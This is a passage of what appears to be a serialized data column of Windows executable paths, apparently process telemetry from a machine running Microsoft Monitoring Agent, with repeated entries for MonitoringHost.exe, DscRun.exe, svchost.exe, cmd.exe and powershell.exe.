Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\unlodctr.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\lodctr.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\MOF\\\\MOFWriter.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3473\\\\WebBinaries\\\\Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\Syste